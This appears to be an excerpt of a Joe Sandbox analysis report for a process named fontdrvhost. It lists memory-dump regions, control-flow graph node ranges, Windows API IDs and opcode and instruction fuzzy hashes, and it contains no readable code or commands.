                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotification
                                                                    • String ID:
                                                                    • API String ID: 2591292051-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 86 7ffd9bbaeaad-7ffd9bbaeab9 87 7ffd9bbaeabb-7ffd9bbaeac3 86->87 88 7ffd9bbaeac4-7ffd9bbaeb92 SuspendThread 86->88 87->88 92 7ffd9bbaeb9a-7ffd9bbaebe4 88->92 93 7ffd9bbaeb94 88->93 93->92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: SuspendThread
                                                                    • String ID:
                                                                    • API String ID: 3178671153-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 96 7ffd9bbb1f85-7ffd9bbb2063 GetFileAttributesW 100 7ffd9bbb2065 96->100 101 7ffd9bbb206b-7ffd9bbb20a9 96->101 100->101
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1802514308.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9bba0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 103 7ffd9c0d86fa-7ffd9c0d88fb 110 7ffd9c0d8906-7ffd9c0d8998 103->110 125 7ffd9c0d896a-7ffd9c0d8979 call 7ffd9c0d899a 110->125 126 7ffd9c0d8940-7ffd9c0d8969 110->126 126->125
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ^^
                                                                    • API String ID: 0-2541302950
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 133 7ffd9b9f16d3-7ffd9ba0fad5 139 7ffd9ba0fad7 133->139 140 7ffd9ba0fadc-7ffd9ba0fae1 call 7ffd9b9f16e0 133->140 139->140 142 7ffd9ba0fae6-7ffd9ba0faf1 140->142
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -O_^
                                                                    • API String ID: 0-3106561898
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 503 7ffd9c0dba00-7ffd9c0dba10 505 7ffd9c0dba1b-7ffd9c0dba23 503->505 506 7ffd9c0dbab1 505->506 508 7ffd9c0dbabc-7ffd9c0dc31c call 7ffd9c0db5e0 506->508
                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 56f6dba99b4e4e91b49085bfc3230689d0356e0fdfdc83b7dc4830f6b4cae8e5
                                                                    • Instruction ID: 4c373a07a24309641f221038a2b92b16f48506c9ee81f9405bfda9d1781c3ad7
                                                                    • Opcode Fuzzy Hash: 56f6dba99b4e4e91b49085bfc3230689d0356e0fdfdc83b7dc4830f6b4cae8e5
                                                                    • Instruction Fuzzy Hash: CD81E130A09B478FE365DB54D1A057177B1FF44348F90467EE08E87A92EB29B892DB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50148dee668535c172617754024bee9696c3f42c1edfd91a355eb436bb78738c
                                                                    • Instruction ID: b194ba83acfbe19eda78c2077cead2895b48268f023a2a203773cd6ba3d14d52
                                                                    • Opcode Fuzzy Hash: 50148dee668535c172617754024bee9696c3f42c1edfd91a355eb436bb78738c
                                                                    • Instruction Fuzzy Hash: A051BE31B1855E8FDB44FFA8E4A5AEC7BE0EF58324F0401BAD44AD7196CA25A885C780
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b676556d358c4db7587b239f24e37089d61dfae4b37a70a3a34a0f4963ac9848
                                                                    • Instruction ID: 7bda44fcafabc0605c0566391a9c6930cb1580f38c1c2def692d1d18f43da3a9
                                                                    • Opcode Fuzzy Hash: b676556d358c4db7587b239f24e37089d61dfae4b37a70a3a34a0f4963ac9848
                                                                    • Instruction Fuzzy Hash: AD51A331B1A69E9FEB60EB68C8586E9BBE0FF55324F0540B6D04DD71A1DE346E84CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc1d3c74830843a3c570cd6fe8076c2155baf6b8ddb51494b4f2e55cf6d343e0
                                                                    • Instruction ID: a6c96655a1b12fde8e0ae435f97998376b5933c7618cad5b3418539ded9740d5
                                                                    • Opcode Fuzzy Hash: cc1d3c74830843a3c570cd6fe8076c2155baf6b8ddb51494b4f2e55cf6d343e0
                                                                    • Instruction Fuzzy Hash: 8E517A70A0590E9FCF84EF98D494EEDBBF1FF69324F050169E409E7260DA74E9908B80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 981a1e706b055a7563d5b499efbe8d77e1d428d33d66d9df0c3dce123a308a20
                                                                    • Instruction ID: d1b2216522cde4bcc0ee233097caf6d798f9742263e88f4da63e0c62292f8473
                                                                    • Opcode Fuzzy Hash: 981a1e706b055a7563d5b499efbe8d77e1d428d33d66d9df0c3dce123a308a20
                                                                    • Instruction Fuzzy Hash: 7A41093094E3CA4FE7579364D8265F53FB0EF83364F0402FAE0898A0A3E7555516C782
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 20a157f2d120df9eede4dd7747ed50c426ae49929062b469dedc47293250adfb
                                                                    • Instruction ID: 204173c91a0f92124ccc980b19ab1f7d2dc8d30ee384fab1147a1e50ac9c207e
                                                                    • Opcode Fuzzy Hash: 20a157f2d120df9eede4dd7747ed50c426ae49929062b469dedc47293250adfb
                                                                    • Instruction Fuzzy Hash: 85412D3270CA498FDFA8FF5CC4A5DA4B7E1EBA8314B04416AD44EC3192DE25EC95CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b28162806247b7128604a80d996486f30f95091ade69c2e6d66bcd4037f67a8
                                                                    • Instruction ID: b8c9918408b252c7adab4369acd6a2bbc8a94f4b2d62cc04c9c5b16649186f6b
                                                                    • Opcode Fuzzy Hash: 3b28162806247b7128604a80d996486f30f95091ade69c2e6d66bcd4037f67a8
                                                                    • Instruction Fuzzy Hash: 7F316E27F0E25A1FE711BBADA4B55E93B90EF91339F0901B3C1D9CA0A3EC15690D8291
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a5edc1ecf706ffd5334a60c543c44ddcb3102be4f62d39fcef93b1f9f92715c8
                                                                    • Instruction ID: fa48013cc257ba6343a44a6f72895f1bacbb9e17080604b9a225961ede6751a7
                                                                    • Opcode Fuzzy Hash: a5edc1ecf706ffd5334a60c543c44ddcb3102be4f62d39fcef93b1f9f92715c8
                                                                    • Instruction Fuzzy Hash: A2412870A1495D8FDF94EF98C895AEDBBF1FF68314F10016AE409E3295CA34A981CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da226102d091921df8ecc4dd443870febb15f0f84607e07656d8cfe43ed797ef
                                                                    • Instruction ID: ae8a82158b6e175ec1a1748f9133b508587dd11275079c00a107cce3c8218b59
                                                                    • Opcode Fuzzy Hash: da226102d091921df8ecc4dd443870febb15f0f84607e07656d8cfe43ed797ef
                                                                    • Instruction Fuzzy Hash: 0041A5B0A0492C8FDBA4DB14C854BE9B7F0EB68315F1041EAD10EE72A5DA756EC48F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction ID: b2bdedd852cdc7de9227cea8618b8a76f80c73495762620138bd37661289af39
                                                                    • Opcode Fuzzy Hash: 0a23c30605631c01bd2b3539aa2c06ca24817389ba452e688064d2f22fb3ba91
                                                                    • Instruction Fuzzy Hash: A231072094E3C64FE753937498696E53F716F43364F1802EAE089CA4E3EB990409D752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1eb5cebe5e0950107ef687ce7d6a742ee97781c78da39ea1038f5e154b8ddeee
                                                                    • Instruction ID: 058db24fbfdf6b5b6ef40050821e5e25dad2cff3e7c1305efd432565e435cb28
                                                                    • Opcode Fuzzy Hash: 1eb5cebe5e0950107ef687ce7d6a742ee97781c78da39ea1038f5e154b8ddeee
                                                                    • Instruction Fuzzy Hash: 9131FE70E1861E9FDFA8DB58D4A5AADB7B1EF58310F0141BED01EE3291DF3469819B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fecae00b085479b74c4e73143c5dfcef38fdc03e7d89f10e5b8c50f340b327e
                                                                    • Instruction ID: 46b15a50f4f692deda7187bb994d4cefe8e82a4346de47b0791baa3fb9227d56
                                                                    • Opcode Fuzzy Hash: 1fecae00b085479b74c4e73143c5dfcef38fdc03e7d89f10e5b8c50f340b327e
                                                                    • Instruction Fuzzy Hash: 71318D30F2964E8BDB64EB98C8657BD7BB1FF49310F11417AD00AD32E6DA742A448B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc12f7dcdcd00c651e95fc8ad82292ed9f17071a2421fbac4d2a305d2d34e336
                                                                    • Instruction ID: 3ad1642e73d400862dfc2942a1559a5d88a44d51cd30540fcc560e00ec19c533
                                                                    • Opcode Fuzzy Hash: fc12f7dcdcd00c651e95fc8ad82292ed9f17071a2421fbac4d2a305d2d34e336
                                                                    • Instruction Fuzzy Hash: 97310F71F1891F9FEBA4EB88C4A29BC77B1FF58340F504775E00ED6195EB246841AB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d05a1684d07cf4cacda93cc37782fc4d8cc1ec9d8c53a1f2bd9df74ff10f958f
                                                                    • Instruction ID: 84f2ee0f62d444cc9529da1988d3f8ccf0afe15198b997a88afee3c73a9e0c61
                                                                    • Opcode Fuzzy Hash: d05a1684d07cf4cacda93cc37782fc4d8cc1ec9d8c53a1f2bd9df74ff10f958f
                                                                    • Instruction Fuzzy Hash: 86313935F1D68E8BE712AFA4C8203FD7BA4EF81320F05457BC5559B1E2CA782A49CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30df9b9fddc1dec6ae20dd9f7a83c8c1fd812244585901fea78d9c28f6d06b8c
                                                                    • Instruction ID: 3e9af377e3347d5ccbb3d8fbb09c06d6e6ae41204720d35141844a3116978fa7
                                                                    • Opcode Fuzzy Hash: 30df9b9fddc1dec6ae20dd9f7a83c8c1fd812244585901fea78d9c28f6d06b8c
                                                                    • Instruction Fuzzy Hash: 8D21FB31E0891D8FDF98EB58D4A5AECB7B1FF68310F0141AA901EE3291DF35A9818B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59a81896139ad43bd544ade613f59ae588c37099ed38480218a79a9b7930bab7
                                                                    • Instruction ID: 1d057459066e463277ea77f888c11b70766718b1bed85adc0c55bb39badec94e
                                                                    • Opcode Fuzzy Hash: 59a81896139ad43bd544ade613f59ae588c37099ed38480218a79a9b7930bab7
                                                                    • Instruction Fuzzy Hash: 1331B670A0491C8FCFA8DB18C854BE9B7F1EB68315F1041EAD10EE32A5DA31AE85CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89c6d9eab7bbc896e22dd2571b0b627c66fba6823d6071a69e7f998d3628667c
                                                                    • Instruction ID: ce70bbca6ecbbbf7971dad198337101258809807fecff57ba30377ca916b758a
                                                                    • Opcode Fuzzy Hash: 89c6d9eab7bbc896e22dd2571b0b627c66fba6823d6071a69e7f998d3628667c
                                                                    • Instruction Fuzzy Hash: F4212A30B1891E9FEB94EFA8C8949ADBBF1FF68310B11457AD419D32A1DB34A941CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b0012a382086178f3493de69f6542f28661131eccfde9ffe59b2f120a4d927c0
                                                                    • Instruction ID: b5c1f4563d3cba8382dbb581edc442c24fefda3603d17bcbc75568b8e0a6ed7d
                                                                    • Opcode Fuzzy Hash: b0012a382086178f3493de69f6542f28661131eccfde9ffe59b2f120a4d927c0
                                                                    • Instruction Fuzzy Hash: 7A11E012F4D39386FA7926E468314BD2674AF457A0F5903BAF84E830C6FE0D28853392
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7733f2f6c5f779523dd4d16b23e8e383c3dd7205050683889bc3e77df055de7c
                                                                    • Instruction ID: 15843f623d7fd5c73c94f581ed6aac20d90f9a8e8b5a9e17c2762bd9094347f0
                                                                    • Opcode Fuzzy Hash: 7733f2f6c5f779523dd4d16b23e8e383c3dd7205050683889bc3e77df055de7c
                                                                    • Instruction Fuzzy Hash: 3D114C35B1D64E4AE712EFA4C8202EE7B64EF81330F054877C5919B2E2DA3857098790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 37a98bd3055f00c31a4e31e0dc0be2cfd83693e0a35c47f6e54c2191aaab4cc0
                                                                    • Instruction ID: 1300a791a80087d17cf2ae35e7a9a46252d86d72420fc46f3581aaed59c6b999
                                                                    • Opcode Fuzzy Hash: 37a98bd3055f00c31a4e31e0dc0be2cfd83693e0a35c47f6e54c2191aaab4cc0
                                                                    • Instruction Fuzzy Hash: 1F117C71A2864D8FCF44EF28C895AEA77E0FF58318F05016AE84DD3251D730A554CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfc19ac8a72230b4cd01d2ab7b73dfe46d9e40aecc30a1bfc516a68747601e4e
                                                                    • Instruction ID: 1e93147d3ab5d5069b2a2acc69737fefb1c255a6eed6099858321882de01bba3
                                                                    • Opcode Fuzzy Hash: cfc19ac8a72230b4cd01d2ab7b73dfe46d9e40aecc30a1bfc516a68747601e4e
                                                                    • Instruction Fuzzy Hash: F2012B31B0D68E4AE712EFA4C8202EE7B64EF81320F054577D5519B2E2CA345709C790
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1848141152.00007FFD9C0D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9c0d0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc518725d1d808e9689f9482acac8a3fcd16afa6d8c726afaaf40020a09bd645
                                                                    • Instruction ID: 6647327c6521d74613cfff41389b755a44f847942f4ab85da935985ab04b69f4
                                                                    • Opcode Fuzzy Hash: bc518725d1d808e9689f9482acac8a3fcd16afa6d8c726afaaf40020a09bd645
                                                                    • Instruction Fuzzy Hash: 66119534E2891EDFDBA8EB98D4A09ADB7B1FF58344F500679E00EE3295DF3468419B50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction ID: 0a6dab3eb7c05c803750d3aff1e62620a2586a089ecffbc979876acd7aabcf43
                                                                    • Opcode Fuzzy Hash: 314f1ac0b346bfa732352059bb14de0d694f24d789853697903efdb36887edf3
                                                                    • Instruction Fuzzy Hash: F021C470A1A62D8EEB64EF54CC59BA8B7B1EB54315F1042E9D40DA22A1DB342EC4CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000008.00000002.1786200291.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_8_2_7ffd9b9f0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 553313a947f84ee103d180bc82a783c01370319039905ccd2b4a309d66472c54
                                                                    • Instruction ID: 311dbcc977114fc71c7ab2077bc6ae1a30d599f9610e9069a6cf4c36e8bc1b01
                                                                    • Opcode Fuzzy Hash: 553313a947f84ee103d180bc82a783c01370319039905ccd2b4a309d66472c54
                                                                    • Instruction Fuzzy Hash: 02012C3060894D9FDB84EF58D895AEE7BA0FF29301F0101A6F858C3161CA30E5A5CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

